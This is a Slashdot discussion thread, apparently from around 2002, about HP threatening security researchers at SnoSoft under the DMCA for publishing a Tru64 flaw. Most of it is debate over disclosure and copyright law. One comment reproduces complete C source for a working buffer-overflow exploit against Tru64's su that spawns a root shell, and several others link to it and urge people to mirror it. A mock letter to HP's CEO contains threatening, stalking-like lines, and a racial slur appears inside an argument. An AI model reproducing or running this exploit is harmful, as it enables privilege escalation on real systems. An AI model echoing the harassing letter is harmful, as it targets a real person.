Slashdot Mirror
HP Uses DMCA To Quash Vulnerability Publication
Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
What if snosofy suddenly openened a branch office in say... Egypt... then an employee of the egypt office became aware of the vulnerability and announced it in Egypt.
Would that be a valid work around for the DMCA ?
So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?
Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.
People shape laws. Not the other way around.
that someone is writing down all these "infractions" of the DMCA so that regular people can see a) what a pathetic joke this law is and b) that the government is no longer making laws for the people but for the lobbyists instead.
Wouldn't this be similar to M$ deciding to sue virus writers for exposing security flaws in Windows? It's awful that companies have decided to start prosecuting anything, even when people are just trying to help. It is ending the hobbyist mentality that helped produce such quick innovation over the last thirty-some years.
When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.
Anyone still feel like laughing?
Here's another fucking BIG CORP trying to strongarm to get there way.
Fuck HP. IT's like Ford trying to get the safety concerns of the Pinto hushed up.
Consumers are in danger, and WE COME FIRST.
Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...
-Chris
--an unbreakable toy is useful for breaking other toys--
If suits like this go to trial, and don't result in huge gains for the plaintiff, the caselaw will tend to discourage others. In some ways that would be better than a repeal.
-fb Everything not expressly forbidden is now mandatory.
Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."
When will people learn this is the same thing?
Finding and publishing a security hole in an OS is not a way to circumvent copyright protection.
If I take over somebody's True64 machine via this security hole, I haven't broken copyright at all.
Now, if I take documents off of the server, then I may be breaking copyright, but I don't think the connection is strong enough to stand up in a court of law.
I could hold up a book store with a gun and make them give me their books. I've stolen the books and therefore broken copyright. Does that mean we should ban guns since they are a possible copyright protection circumvention device?
Wait let me see if I get this straight...
Code has "flaw"
"hackers' find flaw and get threatened with half a million dollar lawsuit.
This is just insane. When will this ever end. HP should be thanking them. I think what needs to be done is a grassroots lobbying campaign amongst the "hackers" to create their own soft money lackeys in DC. And do away with all this DMCA and RIAA BS once and for all. I'll click the paypal button.
I am curious which part of the DMCA would be violated in exposing this security flaw?
It was legitimate for you to cooperate with HP's valid concern that, as a "deep pockets" organization it would be too risky for them to let you challenge the DMCA. I understood that.
But now it appears that you work for a company that is using the DMCA as a club to suppress discussion of security flaws. It doesn't seem that the two hats you wear (your HP role and your open source leadership role) are compatible unless you can persuade HP to back off.
It is possible, of course, that the DMCA threat is coming from one manager who is shooting his mouth off. If so, we need a clarification from higher management: is it the policy of HP to use the DMCA to suppress discussion of their security flaws, or not?
take them to court. This would be a great case to show just how unconsitutional this law is.
Customers have a right to know about the product, and snosoft has the right to speak out about it. Isn't this a clear case where DMCA violates the first amendment.
Simply linking to the source code, like they are could get them into trouble, could it not?
http://deepmagic.securify.org.uk:8080/su.c
HP bad, DMCA bad
MPAA and RIAA have caused more destruction of american freedom than anyone else in the past decade.
* Technically, they only threatened to invoke the DMCA. As of now, HP has also only threatened to invoke it.
-- Don't Tase me, bro!
"On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "
Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.
Come to the University of Mars! Classes starting soon!
this is really a shame. hp was one of the technology companies that had a lot going for it.
when you are fighting in a tough market *and* trying to make a merger happen without too much bad stuff, it seems that it is counter-productive to play this game: you make people mad, you spend resources (money and man-hours that could be easily used elsewhere) and you are *not* going to achive the immediate goal of supressing bad stuff (real or imagined).
so hp gets more points in the bad pr column, they waste money, and the problem doesn't go away. i hope that they spin off the printer division before they crash and burn.
eric
p.s. i guess the worst part is that hp *didn't* learn from all the other companies that went down this path.
got fed up of corporate bullshit
here is the warez, nothing special, but it does the job
note, this is just one of many many exploitable bofs in tru64 5.x
http://deepmagic.securify.org.uk:8080/su.c
phased
phased@mail
How are we to feel secure while computing if it is illegal to check up on the companies providing the software/hardware solutions?
... except the criminals who are going to exploit the vulerability and steal hard earned money.
Imagine if you would, a secure piece of software ( or a secure piece of hardware ) is sold to handle monitary transactions, no-one can verify that the software/hardware is infact secure
Yeah for the DMCA for protecting corporations instead of the individual!
my 2 cents.
I will never buy another one of your products, and I am seriously considering returning the ones that I have. I am in the position that has a great deal of spending power and 95% of the say as to what my company purchases, and I will never purchase an HP or Compaq product again. Thank you very much.
Sincerely,
A Former Customer.
(B) + (D) + (B) + (D) = (K) + (&)
You know if every /. reader just sent their legal department mail asking for the address to send back all their HP products, it might - just might - get their attention. I am gonna call from my business tomorrow and tell them I am sending back all my company's HP products and switching every printer to LexMark.
to keep sucking at the tit of the New HP.
Money is like a drug, and Bruce is hooked.
(Why is Bruce 2 faced? He talks about Open Source, but won't even mention any OS other than Linux.)
in other news today the FBI raids the offices of SnoSoft in search of DMCA prohibited cracking tools, they immediately sieze compilers, source code, and felt markers.
It appears that Mr. Ferson's current e-mail address is kent.ferson@compaq.com.
Just a suggestion...
- Securith through Obscurity
and- Security through Diligence
we now add the mighty- Security through Litigation?
To be fair, when do the handgun designers go to jail again?Kevin Fox
Ok someone fill me in here:
How on earth does a law pertaining to the circumvention of copyright protection systems apply at all to someone releasing a security flaw in an operating system?
Here's the source, baby!
A big customer could claim this damages their ability to operate and sue HP for suppressing information, the absense of which could lead to increased vulnerabilities in their systems.
It's too bad that people have egos, also, because if things like hard crypto implementations, security information, and so on were simply released anonymously into various outlets (e.g., not just the net), there would be nobody to sue.
In this case I think there won't be anybody to sue either -- the individual who made the report might not be subject to US law.
Take this to its logical conclusion, and realize that computer systems in the USA will tend to be less secure than their counterparts in free countries that do not suppress information exchange. I wish it were simpler to relocate to Europe; it sure as hell appears to be easy for them to relocate to the USA.
-fb Everything not expressly forbidden is now mandatory.
The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.
HP trying to cover this up just proves its a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OS'.
People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their carreers. Data important to one's carreer (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.
We have the right to know exactly what problems their are in our software.
social sciences can never use experience to verify their statemen
Is it me, or if you changed HP to Microsoft this would actually sound normal to most of us, as wrong as it may be. I'm actually quite dissappointed.
My question is why has it become illegal to expose a threat to security? Isn't this what people do all the time to our government? Just because it puts a black mark on HP or Microsoft or whoever else it happenes too why should the person who was protecting the larger population from a possible threat be punished?
my $.02
The DMCA just made this world a safer place.
Don't ask, don't tell.
-- My HARDWARE, My CHOICE.
This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...
Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.
Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).
It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.
and its first post-merger PR disaster. May the HP way rest in peace.
CEE5210S The signal SIGHUP was received.
Email their president and CEO from this page!
Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.
--Won't that be grand? Computers and the programs will start thinking and the people will stop. - Dr. Walter Gibbs
If anyone is interested, you can send HP's CEO; Carly Fiorina an e-mail from the "contact us" page on HP's website. Click on "Contact HP"; scroll down to where it says e-mail HP and click on the box below where it states "I have a question that is not product or service related" At the bottom of the list click on Carly Fiorina's name. Send the CEO a message with your concerns.
HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."
As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.
Schwab
Editor, A1-AAA AmeriCaptions
For HP to swallow Compaq, pass IBM in size and turn into Evil Incarnate -tm.
Sad.
Compaq R.I.P. One of THE cool companies. Made great servers, now slandered as "HP" ProLiants... I despised HP Netservers as a network engineer.
Corporatism != Free Market
`Oh, now _this_ is fair!'
Got time? Spend some of it coding or testing
Some people seem to forget that the real villain here is the US Government, who made DMCA into law.
HP is just using any legal means it has available to defend it's (percieved) interests. If they didn't do it, someone else would, over time. Or even if no one did, the mere threat that it is a possible legal recourse for a grumpy corporation is enough to put a chill on these things.
The existance of the DMCA is the real problem. So focus on that.
For those of you who are HPaq-ese impaired, here is the message:
Dear HPaq customers,
We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. I you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive cusomers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, muy coke dealer is here. And don't forget to F off!
P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DCMA.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
You can download the source code here.
The theory of relativity doesn't work right in Arkansas.
http://deepmagic.securify.org.uk:8080/su.c Pretty small program!
What a perfect example - a really easy to demonstrate abuse that the DMCA allows. Hell, I could show this case to my non-techie relatives, and they'd understand just how wrong it is. Go HP - this type of bullying helps more then 10 highly payed lobbiests.
"What we have here, is a failure to communicate." - Cool Hand Luke
I smell gravy cooking!
keanmarine.com
Why not just all mirror this code, let HP figure that one out...
Author, Shell Scripting : Expert Re
HP -> MS = 42.(not the difference, the set of letters between them)
42 is the answer to life, the universe, and everything.
Just what exactly did Douglas Adams know about Tru64...and where is my Pan-galactic gargle blaster????
Oh sorry, it's over here.
When HP finds out that news.com is publishing a link to the exploit, they'll probably want to shut them down too.
Sorry to hear that you're no longer interested in the 64-bit market segment. I can't really blame you, I suppose you're better off selling medical equipment like heart monitors. Too bad that you made it quiet clear that you have no intentions of ever coming back, or else you wouldn't have taken a shit right in our faces before you left.
#include stdio.h
#include stdlib.h
#include string.h
#include unistd.h
char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "xff\xff\xff\xff" "x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j; char buffer[8239]; char payload[15200];
char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i8233;i++) buffer[i] = 0x41;
buffer[i++] = 0x01; buffer[i++] = 0x04;
buffer[i++] = 0x01; buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.
At least when bnetD was sued there was some theoretical idea of a "copy righted" work that was being circumvented. What is HP going to do, claim that there OS's intelectual property is actually being protected by their lack of a bounds check in their buffer overflow? So when the next whole in outlook is discovered and microsoft doesn't want to do anything about if for 6months yet exploits are being found in the wild are they just gonna sue the script kiddies rather than spend the extra $$ to fix the stupid off by one error? This is silly and exactly the kind of abuses that the open source community has been clamoring about since the DMCA's inception!
If religous zealots don't believe in Evolution, then why are they so worried about bird flu?
It's worthwhile taking some lessons from history. Time was, there was a huge debate in the press - somewhat before George Washington - about whether Locksmiths should publish data about vulnerabilities of locks.
The answer that was eventually arrived at was "Of course, because the professional crooks already know the vulnerabilities, and to publish would reveal to the customers what shoddy goods some locks were, and help improve the state of the art." (sorry, I've been unable to find some quotes on the web). The parallels are obvious.
Another parallel : see the Associated Locksmiths of America's Code of Ethics.
Zoe Brain - Rocket Scientist
Bah.
Fuck off HP, and I thought you weren't a Disney-like asshole company.
But I'm wrong. I won't be buying anything from you guys, that's for damn sure.
-- Note: If you don't agree with me, don't bother replying. I won't read it.
But apache doesn't have to support as many investors as HP does. Think about the investors. If this bug were to be reported, these poor, defenseless investors would lose money. You don't want them to lose money, do you? That wouldn't be very nice of you.
Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.
Zoe Brain - Rocket Scientist
How about we setup a "standard" for finding unpublished documents on a P2P network. That way techs can get the information necessary to do our jobs, and the authors can be somewhat safe in publications.
AND, just in case anyone from HP is listening. I handle purchasing for my company. Our order is being canceled due to "lack of information about vulnerabilities"....
Ever since Digital was bought by Compaq, it has gone down the tubes...
If it can be done to RIAA for simply having their sock puppet propose a bad law, it damn well better be done to someone who actually uses a bad law like DMCA for immoral purposes.
I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.
The first issue is HP's request that Bruce Parens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.
The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.
Please reconsider your decision to use the Digital Millenium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.
I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.
It just occurred to me thinking over this issue that HP and the other major corporations have made their positions plain - they have decided how they are going to deal with our ability to easily disseminate and copy information. The government has decided what it is going to do in regards to this issue - that is to side unilaterally with the corporations against it's constituents.
/. readers to one degree or another favor the rights of the individual to express him or her self, to share information and to act to actively uphold those ideals.
/. is that it provides us with a forum to sound off and occasionally mobilize.
Interestingly, we've decided what we're going to do too. Anyone reading this post (trolls and whoever is pressing refresh in attempts to get fp excepted) has already pretty much decided about how they feel. Most
And one of the brilliant things about
What many of us (me included) need to do is really figure out exactly how we're going to react to all of this. Not just what I'm going to think, but what I'm going to actually do. This sort of thing threatens our personal freedoms, in some cases threatens our livelyhood, threatens shared resources that we hold to be valuable etc...Cheering on the occasional script kiddie who DoS's a corporate server isn't enough.
Not trying to start a revolution here, just trying to clarify my thinking in a public place...
I'd say: why help those companies in the first place? They charge an arm and a leg for their defective software, let them fix it themselves. If their software doesn't work as advertised, sue them if your contract permits it, or switch to something else. Don't waste your time and money on doing some vendor's quality control for them.
Unless they are doing it for the credits, there no reason at all to not simply release the source code anonymously, without claiming any credit for it whatsoever.
No credit -> No blame
I can see HP's problem... the posting referrred to the exploit as "warez", so it was a "r3534r(|-|3r" and not a "researcher" -- some kid working on his PhD -- who came up with the exploit, from all evidence. Being realistic, they *have* to bluster and otherwise overreact: they have a fiduciary responsibility for professional feather ruffling, given the apparent source of the expliut.
Alternately, they could always *fix* the problem...
-- Terry
Interestingly enough, I fail to see how SF could remove one post from Bugtraq, due to the many independent archives around the world. Or maybe is that just a first step before suing SF?
It's HP's own damn fault the flaw exists. And now they are trying to squash out legitimate publication of it. All they are doing is driving the exploit underground where only script kiddies will have access to it.
If the security community doesn't know about the flaws (and workarounds to fix them), and the script kiddies do, they are biting their own asses because they are going to have a really shitty insecure product that is going to have a reputation for being hax0red.
Yeah, the flaw was released without telling HP first, but who cares... HP needs to FIX THEIR SHIT and stop the bitching.
Need Free Juniper/NetScreen Support? JuniperForum
Aparently big corporations don't want flaws in their products exposed and prefer to use lawyers to "secure" their OS. So it's back to the days when exploits floated around in usenet-news (from untracable sources) and a worm/virus had to bring down millions of systems before the softwarecompanies admit there is a security hole?
And there i thought that those companies learned to value security over marketing issues. But obviously thinking farther into the future than 3 months is uncalled for these days. Business sense is dictated by the shareholders now, and the results are shortterm tactics without overseeing the big picture (in this case that fixing security holes is more important in the long run, than sweeping them under the carpet).
"By the way if anyone here is in advertising or marketing... kill yourself." -- Bill Hicks
If the issue is because Bruce has already gone on record against DMCA, then yes I can see the conflict. But asking Bruce to choose whether he serves the interest of the open source community yet work for a company doing odd things with DMCA, then no I don't see any reason to choose sides.
To Whom It May Concern,
Due to HP's recent abuse of the DMCA I have decided to never purchase an HP or Compaq product again. I am currently the IT manager of a consulting company, who shall remain nameless due to fear of litigation, and am in line to eventually become the CIO of this rapidly growing company. I have in the past been a supporter of HP products, especially your printers and UNIX servers, and Compaq products as well, and this decision has forced me to re-evaluate my commitment to HP. I recently purchased two HP LaserJet printers, one of them has been installed, but the other is still in the box and will be returned in exchange for a different manufacturer. I have a purchasing power of tens of thousands of dollars per year, that will be growing to hundreds of thousands in the future; as well as 95% of the say as to what my company purchases. I can wholeheartedly state that we will never purchase an HP or Compaq product again. I will also be encouraging my colleauges and personal friends to stay away from HP and Compaq products in the future as well. It is time for companies to learn that not only can their CEO's cheat their shareholders out of their retirements, but they cannot use litigation to solve the problems created by their inferior products and broken business models. Thank you for your time and consideration.
Sincerely,
P.S. Please feel free to email me with any questions or comments you might have regarding this note.
(B) + (D) + (B) + (D) = (K) + (&)
Why when Felton stood up, they backed away? They don't have an EVIL HACKER to villify.
Fight Spammers!
"Does that mean we should ban guns since they are a possible copyright protection circumvention device?"
That's a great idea! Wow, you should be a senator!
The real reason, they are pissed is that they fired the Tru64 people already and HP does not want to make a patch for it. HP was pissed at OpenSSH when the vulnerability in it came out. They had to hire the people back to fix the problem, now they have to hire back again.
Is it a violation of the DMCA to attempt to circumvent the protection of the DMCA by damaging the DMCA?
I thought the DMCA was only used to protect any circumventing of technologies that protect copyrighted materials....
Since the circumvention is related to a security system that doesn't protect a copyrighted material, can they even use the DMCA????
When was the last time the EFF won a major case?
It seems to me that EFF has had no significant impact on legislation or case law.
The 1st amendment tack is all played out; find some case law relating to property and copyrights and argue around them.
At this point, I propose an IT general strike.
The corporate powers have already taken your retirement funds. The U.S. governmenet has given your jobs to non-citizens. CEO's have made off with ill-gotten gain baised on your intellectual property.
Maybe when the phone stops working, the lights go out, and electronic financial transactions stop, maybe, just maybe, important issues regarding freedom will get noticed.
Am I proposing an active attack on infrastructure; NO, never...just inactive neglect.
As we all know, you are getting laid off one of these Fridays anyway.
The Janitoras went RealLife on him. He has lost his job and his rent controlled apartment. His domain was DoSed off of the net. He can only post from the free stations at the library.
It is just ridiclous that SF caved on this issue. Another good list bites the dust.
I wonder if HP realizes the shitstorm it just released on itself, every other OS manufacturer out there, and every other company and individual that codes publicly released software.
In the recent past the community itself made a reasonable effort to begin notifying developers that they had bugs in their code and give them a reasonable ammount of time to fix said code and deploy patches before making the bugs public. It wasn't a perfect system and not everyone played by the "rules" but at least people seemed to want to behave responsibly.
Now HP has thrown down the gauntlet, and given the one finger salute to every uber haxor, wannabe, script kiddie, grey hat, glam hungry geek on the planet.
Gee the "New HP" sure is acting like some old ignorant twits. You cannot police what you cannot control. And as quickly as the "security community" tried to legitimize themselves - many of them can vanish right back under the limitless depths of the ether.
Mmmmm peer to peer websurfing, mailing lists and newsgroups. Masked behind proxy after proxy. Hosted on a million webservers. *Homer Gurgle*
http://windows.scares.us
1. Start (Intern|N)ational Computing Safety Board (as opposed to the U.S.'s National Transportation Safety Board.
2. ???
3. Profit! (either from $BIG_CORP bribes or actually getting the Board to work for its intended purpose, either should work)
4. ???
5. Profit! (from lack of $BIG_CORP)
In other words: "This is so cool! I'll use your money to get elected, then I'll put your entire industry in prison to cover my tracks!" --Dogbert
Let the crackers have it.
...richie - It is a good day to code.
I'll admit I'm a little new to this subject. Looking over the comments it seems overwhelmingly against HP. Correct me on this, but didn't snosoft publish information on the vulnerability plus code to exploit it without letting HP know first, and give them a chance to correct it? If somebody figured out how to break into your house and published on the internet and you found out the hard way, wouldn't you be pissed? If I don't have the facts right, please set me straight!
It might be interesting to watch HP's stock values, if word of this gets out before a patch does.
Sheesh, evil *and* a jerk. -- Jade
Flamebait is attempting to outrage eg "You're a fucking idiot".
A troll is something that attempts to subtley provoke you. Mispelling Linus Turvaldes name, for example, and intentional errors (Linux DOS, VB kernel hacker, etc). Look at egg troll's google posts. Most are way to obvious, (but still get biters). If you removed some of the more glaring errors, they'd be perfect trolls.
and fuck COMPAQ too, the inventor of the Tru64 DMCA-loving UNIX.
Yes... Things change... Now, it's called the Hewlett Compaqard way... and it will go downhill, sadly.
Just because they work there does not mean they agree with HP's DMCA debacle. People have the right to work where they please and we have the right to ignore them if we choose.
What is the difference between a private company and a public company?
The public company sells stock on a public exchange. This makes it subject to certain financial disclosure requirements. A private company is generally owned by its principals who are also generally involved in the day to day management of the company. A private company does not have to make significant financial disclosures to the public or it's employees.
In both cases the goal of the company is to make money for its owners/investors.
In most cases the ultimate goal for a private company is to 'flip', or go public, cashing out the owners. The process of flipping is carefully engineered to present an appearence of great value where in fact there may be none.
NONE of this has anything to do with customer satisfaction other than that needed for commercial operations.
It's not "rediculous", it's RIDICULOUS.
It's NOT spelt the way you pronounce it, ok ? Pet hate. Get a dictionary/spell checker ASAP.
hp -> B====D O: - customers
3l33t h4X0Rz suck
Anal DMCA cHOp!
X'Ploit? What xploit?
Companies that deal with software are less supporting of DMCA. If they have a bug in their software, they whip out a patch, put it on their webpage and tell people to install it themselves. They have little to lose if someone hacks around their software since they can more cheaply play a game of cat and mouse with the hackers with the full source code at their disposal where the hacker has none of the proprietary code.
Mrs Fiorina,
I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.
Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.
Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.
This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.
I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to reccomend that anyone give their money to Hewlett Packard.
Looking forward to your response.
[Name Removed]
--
"I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett
I know this is -1, but please, the law is the DMCA. Fix the dyslexia and straighten the letters. DMCA. Not how you spelled it. That's wrong. DMCA. I'm not going to write what you wrote because you might think it's correct for some reason.
In the future, please, help stop the spread of this rampany dyslexia. Digital Millenium Copyright Act. DMCA.
Comment removed based on user account deletion
Probably because the EU has no "First Amendment".
That being said, it's rather sad how having a "First Amendment" here in the states doesn't seem to matter for much anymore.
The DMCA is just one of the latest signs of "First Amendment rot" to infect us. People are getting jailed and fined for using foul language. That is just stupid.
So called "Hate Crime" laws just criminalize what you say. If I am a white person and I kill a black man while yelling "die nigger die!" how is that any worse than killing a white man yelling "die sucker die!"? Killing is already illegal. I "hate" the black man, but for some reason I don't "hate" the white man? So killing him was what, an act of love?
Even "anti-terrorism" laws are inherently anti-free speech. All terrorism type laws do is criminalize politically incorrect actions. Giving to the IRA, or the PLO, or FeGong (is this last one correct?) is either patriotic, or helping terrorists. The only difference is who's side you are on. The American revolutionaries were freedom fighters to the colonists and terrorists to the British. Same with the Palestinian Liberation Organization. The Irish Republican Army is fighting to free Northern Ireland from British rule, to the British they are a terrorist organization. The same with al-Qa'eda, to their supporters they are terrorists, to most September 11 Americans they are terrorists. Who you talk to, associate with, ideologically support shouldn't be illegal.
What happened on September 11th was already illegal. If a bunch of random people hijacked a few planes and crashed them into the WTC and the Pentagon, guess what, we could still prosecute them. Hijacking, murder, conspiracy to commit murder, etc. are all already illegal. All that calling it terrorism does is give the government an excuse to grant themselves new sweeping police powers. They curtail your civil and constitutional rights, and then broaden the definition of terrorism to include anyone who is against them ideologically or politically. Anti-WIPO, Anti-RIAA/MPAA, Anti-anything the powers that be like? Congratulations, you are a terrorist. Take apart your DVD player, you my friend are a terrorist. Believe that people should stop eating meat or wearing fur, terrorist. Think that Pres. Bush has gone too far with the Patriot Act/Dept of Homeland Security/Dept of Public Propaganda/National ID card/Military tribunals/etc. most definitely a terrorist. Please report to the nearest detainment facility, where you will be stripped of your customary legal protections, locked up for an indeterminate period of time, possible tortured, denied a lawyer, a trial, or an appeal. No need for anyone else to be concerned. You are a "terrorist". These things must be done to keep society safe. Yea right.
Saying the wrong thing, or the right thing to the wrong people is now very much illegal. The EU is starting to look down right enlightened, and that's a scary thought.
Just my $0.02 (Canadian, before taxes)
Due to HP's recent abuse of the DMCA I have decided to never purchase an HP or Compaq product again
I would be more specific. Cite the actual situation concerning the Tru64 vulnerability and their threat of litigation. If you simply use the phrase, "HP's recent abuse of the DMCA", and nothing else, the recipient may not know what you are talking about.
Here's what I sent. Do you guys think I should've emphasized the negative effects of the DMCA on HP's public image, a little more? Hard to pitch the balance right..
-------
Dear Miss Carly Hot Pants (if I may call you that):
I think you're a babe. I've been admiring you ever since I saw you with that dweeb Compaq CEO on CNBC. What's he got that I haven't got? I wish it were me standing on that stage next to you, shaking your hand. I hope he gets cancer and dies.
I read in a magazine that you like to go running. I like to go running too. I think you'd like to go running with me. I'm going to find where you live, so I can go running with you. I own a lot of HP products.
I want to get into your pants and learn more about the "new HP way". I want to "check the bottom line" with you (that's an accounting joke Carly, I hope you're laughing. I hate it when people don't laugh at my jokes). I think you'd really understand me. I know you won't just send me a form letter like Martha did.
Signed,
Your biggest fan.
PS: don't sue that hacker. But if it meant you and I could be together, I'd let you sue him. I love you Carly.
When I said;
"...The same with al-Qa'eda, to their supporters they are terrorists, to most September 11 Americans they are terrorists."
I meant;
"...The same with al-Qa'eda, to their supporters they are FREEDOM FIGHTERS, to most September 11 Americans they are terrorists."
Sorry for the blunder.
Just my $0.02 (Canadian, before taxes)
Well said, sir.
"Ferson also said that HP reserves the right to sue SnoSoft and its members 'for monies and damages caused by the posting and any use of the buffer overflow exploit.'"
If that is the case, then I think consumers have the right to sue HP when there sytems get hacked with a known vulnerability.
It is a 2 way street baby!
--dan
I am not much of a political science student. Can someone inform me how this works? Congress can pass all the stupid laws it wants to, correct? But then usually a case will end up going to the supreme court where the high court examines and can potentially overturn certain unfair/unjust laws. Am I correct on this? Wouldn't it be good to welcome a high visibility case of the DMCA. Then, and only then, will the high court look at this issue.
If companies start to make it a habit of suing people who tell the truth about them people will stop trusting these companies. Why did they tell HP about it first? They were honest and got bitch slapped. So, next time the researchers will think twice before going to the company. Maybe they will just publish on FreeNet or leak their story on Slashdot first?
Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.
This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irrepairable damage to HP.
We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?
It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
Imagine...
You have a brand-new deadbolt lock installed on your front door.
